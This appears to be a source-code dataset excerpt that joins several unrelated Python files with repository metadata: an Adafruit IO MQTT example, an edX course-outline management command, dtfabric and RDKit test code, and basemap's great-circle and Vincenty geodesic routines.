# BLUE_LED = PWMOut.PWMOut(esp, 25)
# status_light = adafruit_rgbled.RGBLED(RED_LED, BLUE_LED, GREEN_LED)
wifi = adafruit_esp32spi_wifimanager.ESPSPI_WiFiManager(esp, secrets, status_light)
# Define callback functions which will be called when certain events happen.
# pylint: disable=unused-argument
def connected(client):
    # Called when the client has connected to Adafruit IO. A good place to
    # subscribe to feed changes; the client parameter is the Adafruit IO MQTT
    # client, so calls can be made against it directly.
    print("Connected to Adafruit IO! Listening for DemoFeed changes...")

    # Subscribe to changes on a feed named DemoFeed.
    client.subscribe("DemoFeed")
def subscribe(client, userdata, topic, granted_qos):
    # Called when the client subscribes to a new feed; logs the topic and the
    # QoS level granted by the broker.
    print("Subscribed to {0} with QOS level {1}".format(topic, granted_qos))
def unsubscribe(client, userdata, topic, pid):
    # Called when the client unsubscribes from a feed; logs the topic and the
    # packet id (PID) of the unsubscribe request.
    print("Unsubscribed from {0} with PID {1}".format(topic, pid))
# pylint: disable=unused-argument
def disconnected(client):
    # Called when the client disconnects from Adafruit IO.
    print("Disconnected from Adafruit IO!")
# pylint: disable=unused-argument
def message(client, feed_id, payload):
    # Called when a subscribed feed has a new value. The feed_id parameter
    # identifies the feed, and the payload parameter has the new value.
    print("Feed {0} received new value: {1}".format(feed_id, payload))
# Connect to WiFi
print("Connecting to WiFi...")
wifi.connect()
print("Connected!")

# Initialize MQTT interface with the esp interface
MQTT.set_socket(socket, esp)

# Initialize a new MQTT Client object
mqtt_client = MQTT.MQTT(
    broker="io.adafruit.com",
    username=secrets["aio_username"],
    password=secrets["aio_key"],
)

# Initialize an Adafruit IO MQTT Client wrapping the raw MQTT client
io = IO_MQTT(mqtt_client)

# Connect the callback methods defined above to Adafruit IO
io.on_connect = connected
io.on_disconnect = disconnected
io.on_subscribe = subscribe
io.on_unsubscribe = unsubscribe
io.on_message = message

# Connect to Adafruit IO
print("Connecting to Adafruit IO...")
io.connect()
# Below is an example of manually publishing a new value to Adafruit IO.
last = 0  # time.monotonic() value of the most recent publish
print("Publishing a new message every 10 seconds...")
while True:
    # Explicitly pump the message loop.
    io.loop()
    # Publish a new random value once the interval has elapsed.
    # NOTE(review): the messages above and below say "10 seconds" but the
    # check uses 5 seconds -- confirm which interval is intended.
    if (time.monotonic() - last) >= 5:
        value = randint(0, 100)
        print("Publishing {0} to DemoFeed.".format(value))
        io.publish("DemoFeed", value)
        last = time.monotonic()
"[email protected]"
] | |
26903997659e0a6ffeafaf3ae4e966b68f912e5f | a9e3f3ad54ade49c19973707d2beb49f64490efd | /Part-03-Understanding-Software-Crafting-Your-Own-Tools/models/edx-platform/cms/djangoapps/contentstore/management/commands/update_course_outline.py | b3ba3bd289199b663c7d1951a01790bf3d31bc50 | [
"MIT",
"AGPL-3.0-only",
"AGPL-3.0-or-later"
] | permissive | luque/better-ways-of-thinking-about-software | 8c3dda94e119f0f96edbfe5ba60ca6ec3f5f625d | 5809eaca7079a15ee56b0b7fcfea425337046c97 | refs/heads/master | 2021-11-24T15:10:09.785252 | 2021-11-22T12:14:34 | 2021-11-22T12:14:34 | 163,850,454 | 3 | 1 | MIT | 2021-11-22T12:12:31 | 2019-01-02T14:21:30 | JavaScript | UTF-8 | Python | false | false | 867 | py | """
Management command to create the course outline for a course. This is done
automatically when Studio publishes a course, but this command can be used to
do it manually for debugging, error recovery, or backfilling purposes.
Should be invoked from the Studio process.
"""
from django.core.management.base import BaseCommand
from opaque_keys.edx.keys import CourseKey
from ...tasks import update_outline_from_modulestore
class Command(BaseCommand):
    """
    Invoke with:

        python manage.py cms update_course_outline <course_key>
    """
    help = "Updates a single course outline based on modulestore content."

    def add_arguments(self, parser):
        # Single positional argument: the serialized CourseKey, e.g.
        # "course-v1:edX+DemoX+Demo_Course".
        parser.add_argument('course_key')

    def handle(self, *args, **options):
        # Parse the opaque key string, then delegate to the same task code
        # that runs automatically when Studio publishes a course.
        course_key = CourseKey.from_string(options['course_key'])
        update_outline_from_modulestore(course_key)
| [
"[email protected]"
] | |
112fe187347b14db8e486b104480e002a756dd8c | 7ae32748fb910d2542e35c57543fc89f98cd2b1d | /tests/test_lib.py | e9e421020e8b554caa7f433988afc2ac71c66236 | [
"Apache-2.0"
] | permissive | sanjaymsh/dtfabric | 451c87d987f438fccfbb999079d2f55d01650b68 | 9e216f90b70d8a3074b2125033e0773e3e482355 | refs/heads/master | 2022-12-19T09:13:02.370724 | 2020-09-27T05:11:25 | 2020-09-27T05:11:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,535 | py | # -*- coding: utf-8 -*-
"""Shared test case."""
from __future__ import unicode_literals
import os
import sys
import unittest
from dtfabric import reader
from dtfabric import registry
def skipUnlessHasTestFile(path_segments):  # pylint: disable=invalid-name
  """Decorator to skip a test if the test file does not exist.

  Args:
    path_segments (list[str]): path segments inside the test data directory.

  Returns:
    function: to invoke.
  """
  force_run = getattr(unittest, 'fail_unless_has_test_file', False)
  test_file_path = os.path.join('test_data', *path_segments)
  if not force_run and not os.path.exists(test_file_path):
    if sys.version_info[0] < 3:
      # On Python 2 the skip message must be a byte string.
      test_file_path = test_file_path.encode('utf-8')
    return unittest.skip('missing test file: {0:s}'.format(test_file_path))

  # File present (or skipping disabled): return an identity decorator.
  return lambda function: function
class BaseTestCase(unittest.TestCase):
  """The base test case."""

  # Absolute path to the test data directory, resolved at import time.
  _TEST_DATA_PATH = os.path.join(os.getcwd(), 'test_data')

  # Show full diff results, part of TestCase so does not follow our naming
  # conventions.
  maxDiff = None

  def _CreateDefinitionRegistryFromFile(self, path):
    """Creates a data type definition registry from a file.

    Args:
      path (str): path to the data definition file.

    Returns:
      DataTypeDefinitionsRegistry: data type definition registry or None
          on error.
    """
    definitions_registry = registry.DataTypeDefinitionsRegistry()

    self._FillDefinitionRegistryFromFile(definitions_registry, path)

    return definitions_registry

  def _FillDefinitionRegistryFromFile(self, definitions_registry, path):
    """Fills a data type definition registry from a file.

    Args:
      definitions_registry (DataTypeDefinitionsRegistry): data type definitions
          registry.
      path (str): path to the data definition file.
    """
    definitions_reader = reader.YAMLDataTypeDefinitionsFileReader()

    # Open in binary mode; ReadFileObject consumes the raw file object.
    with open(path, 'rb') as file_object:
      definitions_reader.ReadFileObject(definitions_registry, file_object)

  def _GetTestFilePath(self, path_segments):
    """Retrieves the path of a test file in the test data directory.

    Args:
      path_segments (list[str]): path segments inside the test data directory.

    Returns:
      str: path of the test file.
    """
    # Note that we need to pass the individual path segments to os.path.join
    # and not a list.
    return os.path.join(self._TEST_DATA_PATH, *path_segments)
| [
"[email protected]"
] | |
51c55ec4d3adb87bc769bf5e76a5abfeeda74e4f | 9e567b8241ce00e9d53843f5aba11c4a119b079f | /tags/v0_5_2/toolkits/basemap/lib/matplotlib/toolkits/basemap/greatcircle.py | 2e205689bff14ecd1a2a0c9c1f4120bfd5ffb277 | [
"LicenseRef-scancode-warranty-disclaimer",
"LicenseRef-scancode-other-permissive",
"LicenseRef-scancode-us-govt-public-domain",
"MIT"
] | permissive | neilpanchal/matplotlib | 3d2a7133e858c4eefbb6c2939eb3f7a328b18118 | 7565d1f2943e0e7b4a3f11ce692dfb9b548d0b83 | refs/heads/master | 2020-06-11T09:20:43.941323 | 2011-01-21T21:50:16 | 2011-01-21T21:50:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 17,660 | py | import numarray as N
import math
__version__ = '1.0'
class GreatCircle:
    # NOTE(review): applying "%" to the literal below turns it into an
    # expression statement rather than a plain string literal, so it is NOT
    # stored as the class docstring (__doc__ is None).
    """
    formula for perfect sphere from Ed Williams' 'Aviation Formulary'
    (http://williams.best.vwh.net/avform.htm)

    code for ellipsoid posted to GMT mailing list by Jim Leven in Dec 1999

    Version: %s
    Contact: Jeff Whitaker <[email protected]>
    """ % __version__

    def __init__(self,rmajor,rminor,lon1,lat1,lon2,lat2):
        """
        Define a great circle by specifying:
        rmajor - radius of major axis of ellipsoid
        rminor - radius of minor axis of ellipsoid.
        lon1 - starting longitude of great circle
        lat1 - starting latitude
        lon2 - ending longitude
        lat2 - ending latitude
        All must be given in degrees.

        Instance variables:
        distance - distance along geodesic in meters.
        gcarclen - great circle arc length in radians.
        azimuth12, azimuth21 - forward and reverse azimuths (radians).
        lon1,lat1,lon2,lat2 - start and end points (in radians).
        """
        # convert to radians from degrees.
        lat1 = math.radians(lat1)
        lon1 = math.radians(lon1)
        lat2 = math.radians(lat2)
        lon2 = math.radians(lon2)
        self.a = rmajor
        # flattening of the ellipsoid; 0 selects the perfect-sphere formulas.
        self.f = (rmajor-rminor)/rmajor
        self.lat1 = lat1
        self.lat2 = lat2
        self.lon1 = lon1
        self.lon2 = lon2
        # distance along geodesic in meters.
        d,a12,a21 = vinc_dist(self.f, self.a, lat1, lon1, lat2, lon2 )
        self.distance = d
        self.azimuth12 = a12
        self.azimuth21 = a21
        # great circle arc-length distance (in radians).
        self.gcarclen = 2.*math.asin(math.sqrt((math.sin((lat1-lat2)/2))**2+\
        math.cos(lat1)*math.cos(lat2)*(math.sin((lon1-lon2)/2))**2))
        # check to see if points are antipodal (if so, route is undefined).
        if self.gcarclen == math.pi:
            self.antipodal = True
        else:
            self.antipodal = False

    def points(self,npoints):
        """
        compute arrays of npoints equally spaced
        intermediate points along the great circle.

        input parameter npoints is the number of points
        to compute.

        Returns lons, lats (lists with longitudes and latitudes
        of intermediate points in degrees).

        For example npoints=10 will return arrays lons,lats of 10
        equally spaced points along the great circle.
        """
        # must ask for at least 2 points.
        if npoints <= 1:
            # NOTE(review): Python 2 raise syntax; consistent with the
            # numarray dependency, this module predates Python 3.
            raise ValueError,'npoints must be greater than 1'
        elif npoints == 2:
            return [math.degrees(self.lon1),math.degrees(self.lon2)],[math.degrees(self.lat1),math.degrees(self.lat2)]
        # can't do it if endpoints are antipodal, since
        # route is undefined.
        if self.antipodal:
            raise ValueError,'cannot compute intermediate points on a great circle whose endpoints are antipodal'
        d = self.gcarclen
        delta = 1.0/(npoints-1)
        f = delta*N.arange(npoints) # f=0 is point 1, f=1 is point 2.
        incdist = self.distance/(npoints-1)
        lat1 = self.lat1
        lat2 = self.lat2
        lon1 = self.lon1
        lon2 = self.lon2
        # perfect sphere, use great circle formula
        if self.f == 0.:
            A = N.sin((1-f)*d)/math.sin(d)
            B = N.sin(f*d)/math.sin(d)
            x = A*math.cos(lat1)*math.cos(lon1)+B*math.cos(lat2)*math.cos(lon2)
            y = A*math.cos(lat1)*math.sin(lon1)+B*math.cos(lat2)*math.sin(lon2)
            z = A*math.sin(lat1) +B*math.sin(lat2)
            lats=N.arctan2(z,N.sqrt(x**2+y**2))
            lons=N.arctan2(y,x)
            # NOTE(review): Python 2 semantics assumed -- map() returns a
            # list there; on Python 3 these would be iterators.
            lons = map(math.degrees,lons.tolist())
            lats = map(math.degrees,lats.tolist())
        # use ellipsoid formulas
        else:
            # march along the geodesic: project each next point with the
            # direct problem (vinc_pt), then re-solve the inverse problem
            # (vinc_dist) to refresh the forward azimuth toward the endpoint.
            latpt = self.lat1
            lonpt = self.lon1
            azimuth = self.azimuth12
            lons = [math.degrees(lonpt)]
            lats = [math.degrees(latpt)]
            for n in range(npoints-2):
                latptnew,lonptnew,alpha21=vinc_pt(self.f,self.a,latpt,lonpt,azimuth,incdist)
                d,azimuth,a21=vinc_dist(self.f,self.a,latptnew,lonptnew,lat2,lon2)
                lats.append(math.degrees(latptnew))
                lons.append(math.degrees(lonptnew))
                latpt = latptnew; lonpt = lonptnew
            lons.append(math.degrees(self.lon2))
            lats.append(math.degrees(self.lat2))
        return lons,lats
#
# ---------------------------------------------------------------------
# | |
# | geodetic.py - a collection of geodetic functions |
# | |
# ---------------------------------------------------------------------
#
#
# ----------------------------------------------------------------------
# | Algrothims from Geocentric Datum of Australia Technical Manual |
# | |
# | http://www.anzlic.org.au/icsm/gdatum/chapter4.html |
# | |
# | This page last updated 11 May 1999 |
# | |
# | Computations on the Ellipsoid |
# | |
# | There are a number of formulae that are available |
# | to calculate accurate geodetic positions, |
# | azimuths and distances on the ellipsoid. |
# | |
# | Vincenty's formulae (Vincenty, 1975) may be used |
# | for lines ranging from a few cm to nearly 20,000 km, |
# | with millimetre accuracy. |
# | The formulae have been extensively tested |
# | for the Australian region, by comparison with results |
# | from other formulae (Rainsford, 1955 & Sodano, 1965). |
# | |
# | * Inverse problem: azimuth and distance from known |
# | latitudes and longitudes |
# | * Direct problem: Latitude and longitude from known |
# | position, azimuth and distance. |
# | * Sample data |
# | * Excel spreadsheet |
# | |
# | Vincenty's Inverse formulae |
# | Given: latitude and longitude of two points |
# | (phi1, lembda1 and phi2, lembda2), |
# | Calculate: the ellipsoidal distance (s) and |
# | forward and reverse azimuths between the points (alpha12, alpha21). |
# | |
# ----------------------------------------------------------------------
def vinc_dist( f, a, phi1, lembda1, phi2, lembda2 ) :
    """
    Returns the distance between two geographic points on the ellipsoid
    and the forward and reverse azimuths between these points.
    lats, longs and azimuths are in radians, distance in metres

    f - ellipsoid flattening, a - major axis radius (metres).

    Returns ( s, alpha12, alpha21 ) as a tuple
    """
    # coincident (to ~1e-8 rad) points: zero distance, azimuths undefined.
    if (abs( phi2 - phi1 ) < 1e-8) and ( abs( lembda2 - lembda1) < 1e-8 ) :
        return 0.0, 0.0, 0.0

    two_pi = 2.0*math.pi
    piD4 = two_pi/8.0  # pi/4; unused below, kept for parity with vinc_pt

    b = a * (1.0 - f)

    # reduced latitudes on the auxiliary sphere.
    TanU1 = (1-f) * math.tan( phi1 )
    TanU2 = (1-f) * math.tan( phi2 )

    U1 = math.atan(TanU1)
    U2 = math.atan(TanU2)

    lembda = lembda2 - lembda1
    last_lembda = -4000000.0 # an impossibe value
    omega = lembda

    # Iterate the following equations,
    # until there is no significant change in lembda
    # (relative change below 1e-9; the -3000000.0 sentinel forces at least
    # one pass).
    while ( last_lembda < -3000000.0 or lembda != 0 and abs( (last_lembda - lembda)/lembda) > 1.0e-9 ) :
        sqr_sin_sigma = pow( math.cos(U2) * math.sin(lembda), 2) + \
            pow( (math.cos(U1) * math.sin(U2) - \
            math.sin(U1) * math.cos(U2) * math.cos(lembda) ), 2 )
        Sin_sigma = math.sqrt( sqr_sin_sigma )
        Cos_sigma = math.sin(U1) * math.sin(U2) + math.cos(U1) * math.cos(U2) * math.cos(lembda)
        sigma = math.atan2( Sin_sigma, Cos_sigma )
        Sin_alpha = math.cos(U1) * math.cos(U2) * math.sin(lembda) / math.sin(sigma)
        alpha = math.asin( Sin_alpha )
        Cos2sigma_m = math.cos(sigma) - (2 * math.sin(U1) * math.sin(U2) / pow(math.cos(alpha), 2) )
        C = (f/16) * pow(math.cos(alpha), 2) * (4 + f * (4 - 3 * pow(math.cos(alpha), 2)))
        last_lembda = lembda
        lembda = omega + (1-C) * f * math.sin(alpha) * (sigma + C * math.sin(sigma) * \
            (Cos2sigma_m + C * math.cos(sigma) * (-1 + 2 * pow(Cos2sigma_m, 2) )))

    # series expansion for the ellipsoidal correction to the arc length.
    u2 = pow(math.cos(alpha),2) * (a*a-b*b) / (b*b)
    A = 1 + (u2/16384) * (4096 + u2 * (-768 + u2 * (320 - 175 * u2)))
    B = (u2/1024) * (256 + u2 * (-128+ u2 * (74 - 47 * u2)))
    delta_sigma = B * Sin_sigma * (Cos2sigma_m + (B/4) * \
        (Cos_sigma * (-1 + 2 * pow(Cos2sigma_m, 2) ) - \
        (B/6) * Cos2sigma_m * (-3 + 4 * sqr_sin_sigma) * \
        (-3 + 4 * pow(Cos2sigma_m,2 ) )))
    s = b * A * (sigma - delta_sigma)

    alpha12 = math.atan2( (math.cos(U2) * math.sin(lembda)), \
        (math.cos(U1) * math.sin(U2) - math.sin(U1) * math.cos(U2) * math.cos(lembda)))
    alpha21 = math.atan2( (math.cos(U1) * math.sin(lembda)), \
        (-math.sin(U1) * math.cos(U2) + math.cos(U1) * math.sin(U2) * math.cos(lembda)))

    # normalize the forward azimuth to [0, 2*pi).
    if ( alpha12 < 0.0 ) :
        alpha12 = alpha12 + two_pi
    if ( alpha12 > two_pi ) :
        alpha12 = alpha12 - two_pi

    # reverse azimuth points back along the line: add pi, then normalize.
    alpha21 = alpha21 + two_pi / 2.0
    if ( alpha21 < 0.0 ) :
        alpha21 = alpha21 + two_pi
    if ( alpha21 > two_pi ) :
        alpha21 = alpha21 - two_pi

    return s, alpha12, alpha21
# END of Vincenty's Inverse formulae
#-------------------------------------------------------------------------------
# Vincenty's Direct formulae |
# Given: latitude and longitude of a point (phi1, lembda1) and |
# the geodetic azimuth (alpha12) |
# and ellipsoidal distance in metres (s) to a second point, |
# |
# Calculate: the latitude and longitude of the second point (phi2, lembda2) |
# and the reverse azimuth (alpha21). |
# |
#-------------------------------------------------------------------------------
def vinc_pt(f, a, phi1, lembda1, alpha12, s):
    """
    Vincenty's direct formula: project a point along a geodesic.

    Returns the lat and long of the projected point and the reverse azimuth,
    given a reference point and a distance and azimuth to project.

    Args:
        f: flattening of the ellipsoid.
        a: semi-major axis of the ellipsoid (metres).
        phi1, lembda1: latitude / longitude of the start point (radians).
        alpha12: forward geodesic azimuth at the start point (radians).
        s: ellipsoidal distance to project (metres).

    Returns:
        (phi2, lembda2, alpha21) tuple, all in radians.

    Fixes over the previous revision: a stray trailing line-continuation
    backslash merged the delta_sigma statement with the following
    `last_sigma = sigma` line (a syntax error); the unused `piD4` local
    was removed.  The numerics are unchanged.
    """
    two_pi = 2.0 * math.pi
    # Normalise the forward azimuth into [0, 2*pi).
    if alpha12 < 0.0:
        alpha12 = alpha12 + two_pi
    if alpha12 > two_pi:
        alpha12 = alpha12 - two_pi
    b = a * (1.0 - f)                      # semi-minor axis
    TanU1 = (1 - f) * math.tan(phi1)       # reduced latitude of point 1
    U1 = math.atan(TanU1)
    sigma1 = math.atan2(TanU1, math.cos(alpha12))
    Sinalpha = math.cos(U1) * math.sin(alpha12)  # azimuth of the geodesic at the equator
    cosalpha_sq = 1.0 - Sinalpha * Sinalpha
    u2 = cosalpha_sq * (a * a - b * b) / (b * b)
    A = 1.0 + (u2 / 16384) * (4096 + u2 * (-768 + u2 *
        (320 - 175 * u2)))
    B = (u2 / 1024) * (256 + u2 * (-128 + u2 * (74 - 47 * u2)))
    # Starting with the approximation
    sigma = (s / (b * A))
    last_sigma = 2.0 * sigma + 2.0  # something impossible, forces >= 1 iteration
    # Iterate until there is no significant change in sigma.
    while abs((last_sigma - sigma) / sigma) > 1.0e-9:
        two_sigma_m = 2 * sigma1 + sigma
        delta_sigma = B * math.sin(sigma) * (math.cos(two_sigma_m)
                + (B / 4) * (math.cos(sigma) *
                (-1 + 2 * math.pow(math.cos(two_sigma_m), 2) -
                (B / 6) * math.cos(two_sigma_m) *
                (-3 + 4 * math.pow(math.sin(sigma), 2)) *
                (-3 + 4 * math.pow(math.cos(two_sigma_m), 2)))))
        last_sigma = sigma
        sigma = (s / (b * A)) + delta_sigma
    # two_sigma_m from the final iteration is reused in `omega` below.
    phi2 = math.atan2((math.sin(U1) * math.cos(sigma) + math.cos(U1) * math.sin(sigma) * math.cos(alpha12)),
                      ((1 - f) * math.sqrt(math.pow(Sinalpha, 2) +
                       pow(math.sin(U1) * math.sin(sigma) - math.cos(U1) * math.cos(sigma) * math.cos(alpha12), 2))))
    lembda = math.atan2((math.sin(sigma) * math.sin(alpha12)), (math.cos(U1) * math.cos(sigma) -
                        math.sin(U1) * math.sin(sigma) * math.cos(alpha12)))
    C = (f / 16) * cosalpha_sq * (4 + f * (4 - 3 * cosalpha_sq))
    omega = lembda - (1 - C) * f * Sinalpha * \
        (sigma + C * math.sin(sigma) * (math.cos(two_sigma_m) +
         C * math.cos(sigma) * (-1 + 2 * math.pow(math.cos(two_sigma_m), 2))))
    lembda2 = lembda1 + omega
    alpha21 = math.atan2(Sinalpha, (-math.sin(U1) * math.sin(sigma) +
                                    math.cos(U1) * math.cos(sigma) * math.cos(alpha12)))
    # Reverse azimuth points back along the line, then normalise to [0, 2*pi).
    alpha21 = alpha21 + two_pi / 2.0
    if alpha21 < 0.0:
        alpha21 = alpha21 + two_pi
    if alpha21 > two_pi:
        alpha21 = alpha21 - two_pi
    return phi2, lembda2, alpha21
# END of Vincenty's Direct formulae
##---------------------------------------------------------------------------
# Notes:
#
# * "The inverse formulae may give no solution over a line
# between two nearly antipodal points. This will occur when
# lembda ... is greater than pi in absolute value". (Vincenty, 1975)
#
# * In Vincenty (1975) L is used for the difference in longitude,
# however for consistency with other formulae in this Manual,
# omega is used here.
#
# * Variables specific to Vincenty's formulae are shown below,
# others common throughout the manual are shown in the Glossary.
#
#
# alpha = Azimuth of the geodesic at the equator
# U = Reduced latitude
# lembda = Difference in longitude on an auxiliary sphere (lembda1 & lembda2
# are the geodetic longitudes of points 1 & 2)
# sigma = Angular distance on a sphere, from point 1 to point 2
# sigma1 = Angular distance on a sphere, from the equator to point 1
# sigma2 = Angular distance on a sphere, from the equator to point 2
# sigma_m = Angular distance on a sphere, from the equator to the
# midpoint of the line from point 1 to point 2
# u, A, B, C = Internal variables
#
#
# Sample Data
#
# Flinders Peak
# -37o57'03.72030"
# 144o25'29.52440"
# Buninyong
# -37o39'10.15610"
# 143o55'35.38390"
# Ellipsoidal Distance
# 54,972.271 m
#
# Forward Azimuth
# 306o52'05.37"
#
# Reverse Azimuth
# 127o10'25.07"
#
#
##*******************************************************************
# Test driver
if __name__ == "__main__" :
    # NOTE: this driver is Python 2 syntax (print statements).
    # It checks the inverse formula against the published Flinders Peak ->
    # Buninyong sample, then checks the direct formula by projecting back.
    # WGS84
    a = 6378137.0
    b = 6356752.3142
    f = (a-b)/a
    print "\n Ellipsoidal major axis = %12.3f metres\n" % ( a )
    print "\n Inverse flattening = %15.9f\n" % ( 1.0/f )
    print "\n Test Flinders Peak to Buninyon"
    print "\n ****************************** \n"
    # Coordinates given as deg/min/sec, folded into decimal degrees.
    phi1 = -(( 3.7203 / 60. + 57) / 60. + 37 )
    lembda1 = ( 29.5244 / 60. + 25) / 60. + 144
    print "\n Flinders Peak = %12.6f, %13.6f \n" % ( phi1, lembda1 )
    # Decompose decimal degrees back into deg/min/sec for display.
    # (NOTE: `min` shadows the builtin -- harmless in this script.)
    deg = int(phi1)
    min = int(abs( ( phi1 - deg) * 60.0 ))
    sec = abs(phi1 * 3600 - deg * 3600) - min * 60
    print " Flinders Peak = %3i\xF8%3i\' %6.3f\", " % ( deg, min, sec ),
    deg = int(lembda1)
    min = int(abs( ( lembda1 - deg) * 60.0 ))
    sec = abs(lembda1 * 3600 - deg * 3600) - min * 60
    print " %3i\xF8%3i\' %6.3f\" \n" % ( deg, min, sec )
    phi2 = -(( 10.1561 / 60. + 39) / 60. + 37 )
    lembda2 = ( 35.3839 / 60. + 55) / 60. + 143
    print "\n Buninyon = %12.6f, %13.6f \n" % ( phi2, lembda2 )
    deg = int(phi2)
    min = int(abs( ( phi2 - deg) * 60.0 ))
    sec = abs(phi2 * 3600 - deg * 3600) - min * 60
    print " Buninyon = %3i\xF8%3i\' %6.3f\", " % ( deg, min, sec ),
    deg = int(lembda2)
    min = int(abs( ( lembda2 - deg) * 60.0 ))
    sec = abs(lembda2 * 3600 - deg * 3600) - min * 60
    print " %3i\xF8%3i\' %6.3f\" \n" % ( deg, min, sec )
    # Inverse problem: distance + forward/back azimuths between the points.
    dist, alpha12, alpha21 = vinc_dist ( f, a, math.radians(phi1), math.radians(lembda1), math.radians(phi2), math.radians(lembda2) )
    alpha12 = math.degrees(alpha12)
    alpha21 = math.degrees(alpha21)
    print "\n Ellipsoidal Distance = %15.3f metres\n should be 54972.271 m\n" % ( dist )
    print "\n Forward and back azimuths = %15.6f, %15.6f \n" % ( alpha12, alpha21 )
    deg = int(alpha12)
    min = int( abs(( alpha12 - deg) * 60.0 ) )
    sec = abs(alpha12 * 3600 - deg * 3600) - min * 60
    print " Forward azimuth = %3i\xF8%3i\' %6.3f\"\n" % ( deg, min, sec )
    deg = int(alpha21)
    min = int(abs( ( alpha21 - deg) * 60.0 ))
    sec = abs(alpha21 * 3600 - deg * 3600) - min * 60
    print " Reverse azimuth = %3i\xF8%3i\' %6.3f\"\n" % ( deg, min, sec )
    # Test the direct function */
    phi1 = -(( 3.7203 / 60. + 57) / 60. + 37 )
    lembda1 = ( 29.5244 / 60. + 25) / 60. + 144
    dist = 54972.271
    alpha12 = ( 5.37 / 60. + 52) / 60. + 306
    phi2 = lembda2 = 0.0
    alpha21 = 0.0
    # Projecting from Flinders Peak with the known azimuth/distance
    # should reproduce Buninyong.
    phi2, lembda2, alpha21 = vinc_pt ( f, a, math.radians(phi1), math.radians(lembda1), math.radians(alpha12), dist )
    phi2 = math.degrees(phi2)
    lembda2 = math.degrees(lembda2)
    alpha21 = math.degrees(alpha21)
    print "\n Projected point =%11.6f, %13.6f \n" % ( phi2, lembda2 )
    deg = int(phi2)
    min = int(abs( ( phi2 - deg) * 60.0 ))
    sec = abs( phi2 * 3600 - deg * 3600) - min * 60
    print " Projected Point = %3i\xF8%3i\' %6.3f\", " % ( deg, min, sec ),
    deg = int(lembda2)
    min = int(abs( ( lembda2 - deg) * 60.0 ))
    sec = abs(lembda2 * 3600 - deg * 3600) - min * 60
    print " %3i\xF8%3i\' %6.3f\"\n" % ( deg, min, sec )
    print " Should be Buninyon \n"
    print "\n Reverse azimuth = %10.6f \n" % ( alpha21 )
    deg = int(alpha21)
    min = int(abs( ( alpha21 - deg) * 60.0 ))
    sec = abs(alpha21 * 3600 - deg * 3600) - min * 60
    print " Reverse azimuth = %3i\xF8%3i\' %6.3f\"\n\n" % ( deg, min, sec )
    # GreatCircle demo: sphere (WGS84 mean radius) vs true ellipsoid.
    # lat/lon of New York
    lat1 = 40.78
    lon1 = -73.98
    # lat/lon of London.
    lat2 = 51.53
    lon2 = 0.08
    print 'New York to London:'
    gc = GreatCircle((2*a+b)/3.,(2*a+b)/3.,lon1,lat1,lon2,lat2)
    print 'geodesic distance using a sphere with WGS84 mean radius = ',gc.distance
    print 'lon/lat for 10 equally spaced points along geodesic:'
    lons,lats = gc.points(10)
    for lon,lat in zip(lons,lats):
        print lon,lat
    gc = GreatCircle(a,b,lon1,lat1,lon2,lat2)
    print 'geodesic distance using WGS84 ellipsoid = ',gc.distance
    print 'lon/lat for 10 equally spaced points along geodesic:'
    lons,lats = gc.points(10)
    for lon,lat in zip(lons,lats):
        print lon,lat
| [
"(no author)@f61c4167-ca0d-0410-bb4a-bb21726e55ed"
] | (no author)@f61c4167-ca0d-0410-bb4a-bb21726e55ed |
7ff5ace33b7b5f94bd27e78e54a51bb4adfe7e97 | e58fcc1467ad81084b016d2a48d672d75da2c058 | /rdkit/Code/DataStructs/Wrap/testSparseIntVect.py | 3cc02547f6b0be4e87ec009699478e2eb5f412f7 | [
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | ali1810/sol_heroku | 294375d70c656452749e959bfb851a50defc0e01 | 97b548ce7d864e6fed936c53b790c1dc8038cff2 | refs/heads/main | 2023-08-15T06:18:26.933254 | 2021-09-14T10:20:19 | 2021-09-14T10:20:19 | 405,223,280 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,585 | py | # $Id$
#
# Copyright (C) 2007,2008 Greg Landrum
#
# @@ All Rights Reserved @@
#
import os, sys
import io
import unittest
import pickle
from rdkit import RDConfig
from rdkit import DataStructs as ds
import random
def feq(v1, v2, tol=1e-4):
  """Return True when v1 and v2 differ by less than `tol` (absolute)."""
  delta = v1 - v2
  return -tol < delta < tol
class TestCase(unittest.TestCase):
  """Exercises the Python wrappers for Int/Long SparseIntVect."""

  def setUp(self):
    # No shared fixtures; each test builds its own vectors.
    pass

  def test1Int(self):
    """Get/set, length, equality and bitwise-or semantics of IntSparseIntVect.
    """
    v1 = ds.IntSparseIntVect(5)
    self.assertRaises(IndexError, lambda: v1[5])
    v1[0] = 1
    v1[2] = 2
    v1[3] = 3
    self.assertTrue(v1 == v1)
    self.assertTrue(v1.GetLength() == 5)
    v2 = ds.IntSparseIntVect(5)
    self.assertTrue(v1 != v2)
    v2 |= v1
    self.assertTrue(v2 == v1)
    v3 = v2 | v1
    self.assertTrue(v3 == v1)
    onVs = v1.GetNonzeroElements()
    self.assertTrue(onVs == {0: 1, 2: 2, 3: 3})

  def test2Long(self):
    """Same operations as test1Int, with indices beyond 32 bits.
    """
    l = 1 << 42
    v1 = ds.LongSparseIntVect(l)
    self.assertRaises(IndexError, lambda: v1[l])
    v1[0] = 1
    v1[2] = 2
    v1[1 << 35] = 3
    self.assertTrue(v1 == v1)
    self.assertTrue(v1.GetLength() == l)
    v2 = ds.LongSparseIntVect(l)
    self.assertTrue(v1 != v2)
    v2 |= v1
    self.assertTrue(v2 == v1)
    v3 = v2 | v1
    self.assertTrue(v3 == v1)
    onVs = v1.GetNonzeroElements()
    self.assertTrue(onVs == {0: 1, 2: 2, 1 << 35: 3})

  def test3Pickle1(self):
    """Round-trips a LongSparseIntVect through pickle, ToBinary, and a stored fixture.
    """
    l = 1 << 42
    v1 = ds.LongSparseIntVect(l)
    self.assertRaises(IndexError, lambda: v1[l + 1])
    v1[0] = 1
    v1[2] = 2
    v1[1 << 35] = 3
    self.assertTrue(v1 == v1)
    v2 = pickle.loads(pickle.dumps(v1))
    self.assertTrue(v2 == v1)
    v3 = ds.LongSparseIntVect(v2.ToBinary())
    self.assertTrue(v2 == v3)
    self.assertTrue(v1 == v3)
    #pickle.dump(v1,file('lsiv.pkl','wb+'))
    # Fixture is read as text and line-ending-normalized before unpickling.
    with open(os.path.join(RDConfig.RDBaseDir, 'Code/DataStructs/Wrap/testData/lsiv.pkl'),
              'r') as tf:
      buf = tf.read().replace('\r\n', '\n').encode('utf-8')
